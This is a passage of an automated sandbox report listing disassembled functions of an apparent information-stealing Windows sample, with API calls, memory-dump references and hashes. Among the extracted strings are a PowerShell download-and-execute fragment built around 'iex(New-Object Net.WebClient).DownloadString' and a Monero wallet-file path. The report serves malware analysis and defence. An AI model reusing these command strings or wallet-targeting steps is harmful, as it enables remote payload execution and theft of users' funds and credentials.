                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: CurrentBuildNumber
                                    • API String ID: 3225020163-1022791448
                                    • Opcode ID: 065deb102bb2942a3cfd14f2ac002657079d2b64b0bd649ed8596befd393d3d0
                                    • Instruction ID: ea61067c2971ffbed80730bcf6738c5b3957f9f655ec89db2f92ef40650ad5c1
                                    • Opcode Fuzzy Hash: 065deb102bb2942a3cfd14f2ac002657079d2b64b0bd649ed8596befd393d3d0
                                    • Instruction Fuzzy Hash: 0101E1B5A40208BBD701DBE4DC49FEEB7BCEB48701F108555FA15A6281D6745A008B52
                                    Function 000E40B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 000E40D5
                                    • RegOpenKeyExA.ADVAPI32(80000001,00B7FD40,00000000,00020119,?), ref: 000E40F4
                                    • RegQueryValueExA.ADVAPI32(?,00B80870,00000000,00000000,00000000,000000FF), ref: 000E4118
                                    • RegCloseKey.ADVAPI32(?), ref: 000E4122
                                    • lstrcat.KERNEL32(?,00000000), ref: 000E4147
                                    • lstrcat.KERNEL32(?,00B809F0), ref: 000E415B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValuememset
                                    • String ID:
                                    • API String ID: 2623679115-0
                                    • Opcode ID: 2c6b9161beca19f1c9fb5aed20a1de5d03fcde3731b3093057e07f5e2de5c6ee
                                    • Instruction ID: b37f3fe04991d17d9158194bcd14f3e8844336d07f46db10d60e038184b2d0cd
                                    • Opcode Fuzzy Hash: 2c6b9161beca19f1c9fb5aed20a1de5d03fcde3731b3093057e07f5e2de5c6ee
                                    • Instruction Fuzzy Hash: EA417BB6D00108ABDB15EBE0EC46FFD777DA78C300F408559B61557182EE755B888BA2
                                    Function 000D99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000D99EC
                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 000D9A11
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 000D9A31
                                    • ReadFile.KERNEL32(000000FF,?,00000000,000D148F,00000000), ref: 000D9A5A
                                    • LocalFree.KERNEL32(000D148F), ref: 000D9A90
                                    • CloseHandle.KERNEL32(000000FF), ref: 000D9A9A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: 70119b629513392fb3f52042c5664fd6a2c161a024d1101009910b73d6af1764
                                    • Instruction ID: 7deb1bf753477d181bd8f5e737d9617b375fe16709c30ec640008b5e3236897b
                                    • Opcode Fuzzy Hash: 70119b629513392fb3f52042c5664fd6a2c161a024d1101009910b73d6af1764
                                    • Instruction Fuzzy Hash: A031E5B5A00209EFDB14CF98C985BEE77F9BF48351F108159E911A7390D774AA41CFA2
                                    Function 000EC84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: String___crt$Typememset
                                    • String ID:
                                    • API String ID: 3530896902-3916222277
                                    • Opcode ID: e04d6137919512cefbe7e50e249a30663bddc54479348cf81725ed586df5eddb
                                    • Instruction ID: 035dbf4d9d8bd2f7309457ccdff1380730115b2cd60125e251e48a0406ccd822
                                    • Opcode Fuzzy Hash: e04d6137919512cefbe7e50e249a30663bddc54479348cf81725ed586df5eddb
                                    • Instruction Fuzzy Hash: 924107711007DC5EEB318B258D88FFBBBE89B45304F1444A9E9CAA6083D2729A459F20
                                    Function 000E4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcat.KERNEL32(?,00B808E8), ref: 000E47DB
                                      • Part of subcall function 000E8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000E8E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 000E4801
                                    • lstrcat.KERNEL32(?,?), ref: 000E4820
                                    • lstrcat.KERNEL32(?,?), ref: 000E4834
                                    • lstrcat.KERNEL32(?,00B6B0F8), ref: 000E4847
                                    • lstrcat.KERNEL32(?,?), ref: 000E485B
                                    • lstrcat.KERNEL32(?,00B7FBC0), ref: 000E486F
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000E8D90: GetFileAttributesA.KERNEL32(00000000,?,000D1B54,?,?,000F564C,?,?,000F0E1F), ref: 000E8D9F
                                      • Part of subcall function 000E4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 000E4580
                                      • Part of subcall function 000E4570: RtlAllocateHeap.NTDLL(00000000), ref: 000E4587
                                      • Part of subcall function 000E4570: wsprintfA.USER32 ref: 000E45A6
                                      • Part of subcall function 000E4570: FindFirstFileA.KERNEL32(?,?), ref: 000E45BD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                    • String ID:
                                    • API String ID: 2540262943-0
                                    • Opcode ID: 2652f2a5a46a02dd81d55db7daed08c810d8be077e81d52f1292ed8503187dc7
                                    • Instruction ID: 50aa3e6150fbf7d200168bba7364e5fef4d5cb6e1fbcfc5b42f5db027275bb12
                                    • Opcode Fuzzy Hash: 2652f2a5a46a02dd81d55db7daed08c810d8be077e81d52f1292ed8503187dc7
                                    • Instruction Fuzzy Hash: 4B3166B6D00218ABCB11F7B0DC85EED737CAB58701F448589F359A6082EE749789CB95
                                    Function 000E2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 000E2D85
                                    Strings
                                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 000E2CC4
                                    • <, xrefs: 000E2D39
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 000E2D04
                                    • ')", xrefs: 000E2CB3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    • API String ID: 3031569214-898575020
                                    • Opcode ID: 9f7af40ecc143b40097f0d2afcb57f45740752099cef4b08f06860563874cde8
                                    • Instruction ID: 0ee973e9de489af82a2a34cac4fc76ae69d17cdc8d4e1d464e63fce1354805d2
                                    • Opcode Fuzzy Hash: 9f7af40ecc143b40097f0d2afcb57f45740752099cef4b08f06860563874cde8
                                    • Instruction Fuzzy Hash: 01410E71E002889EEB14FBA1CD91BEDB779AF19300F414019E116BA193DF743A4ACF92
                                    Function 000D9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 000D9F41
                                      • Part of subcall function 000EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000EA7E6
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$AllocLocal
                                    • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                    • API String ID: 4171519190-1096346117
                                    • Opcode ID: c0081338641670d16ce7577d5e02d5bd10ccfab35e00278514c23927bd9f2114
                                    • Instruction ID: f30469853021d3ac63a0f7b56bfce3c58ca0bbe0f57cf5e1d1c237e73aef12dd
                                    • Opcode Fuzzy Hash: c0081338641670d16ce7577d5e02d5bd10ccfab35e00278514c23927bd9f2114
                                    • Instruction Fuzzy Hash: E4613E70A00248EFDB24EFA4DD96BEE7775AF45300F048118F9096F696DF746A05CB62
                                    Function 000E7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000E7E37
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000E7E3E
                                    • RegOpenKeyExA.ADVAPI32(80000002,00B6C460,00000000,00020119,?), ref: 000E7E5E
                                    • RegQueryValueExA.ADVAPI32(?,00B7FD00,00000000,00000000,000000FF,000000FF), ref: 000E7E7F
                                    • RegCloseKey.ADVAPI32(?), ref: 000E7E92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: d2a1c9f31166764570169c6b9825c5ffaeba7d319df5ff1e497aa3e08784d0c5
                                    • Instruction ID: b2823698499db78807cc63539ca2cae7f4e7dd604e3ecc55c14cba100ca075d5
                                    • Opcode Fuzzy Hash: d2a1c9f31166764570169c6b9825c5ffaeba7d319df5ff1e497aa3e08784d0c5
                                    • Instruction Fuzzy Hash: 27118CB1A44609EFD715CBD5DC4AFBFBBBCEB08B11F108119F605A7280D77459008BA2
                                    Function 000E9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • StrStrA.SHLWAPI(00B80840,?,?,?,000E140C,?,00B80840,00000000), ref: 000E926C
                                    • lstrcpyn.KERNEL32(0031AB88,00B80840,00B80840,?,000E140C,?,00B80840), ref: 000E9290
                                    • lstrlen.KERNEL32(?,?,000E140C,?,00B80840), ref: 000E92A7
                                    • wsprintfA.USER32 ref: 000E92C7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpynlstrlenwsprintf
                                    • String ID: %s%s
                                    • API String ID: 1206339513-3252725368
                                    • Opcode ID: 4d6e9cb4cfa69ae7044f764f49602c39ac6668cbf32c6ca8d140f5f72da3248d
                                    • Instruction ID: e3eba28b43051f3cd3820fd13b03e30809324b1f8727db19e3b99c4b45f4365e
                                    • Opcode Fuzzy Hash: 4d6e9cb4cfa69ae7044f764f49602c39ac6668cbf32c6ca8d140f5f72da3248d
                                    • Instruction Fuzzy Hash: 97015A75501208FFCB06DFECD988EEE3BB9EB48352F10C148F9099B240C630AA40DB91
                                    Function 000D12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000D12B4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000D12BB
                                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 000D12D7
                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 000D12F5
                                    • RegCloseKey.ADVAPI32(?), ref: 000D12FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: ae1ff951ccce68467aaba8dfb8435b536f1e739173d01f25c9d7b71b69c31ba7
                                    • Instruction ID: 0efd3fe82372044f734c8469b3691dccd0124a7157f17ffbccb3f2ff4cabbad3
                                    • Opcode Fuzzy Hash: ae1ff951ccce68467aaba8dfb8435b536f1e739173d01f25c9d7b71b69c31ba7
                                    • Instruction Fuzzy Hash: D901E1B9A40208BBDB05DFE4DC49FEEBBBCEB4C701F108159FA0597280DA759A018F51
                                    Function 000E6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 000E6663
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 000E6726
                                    • ExitProcess.KERNEL32 ref: 000E6755
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
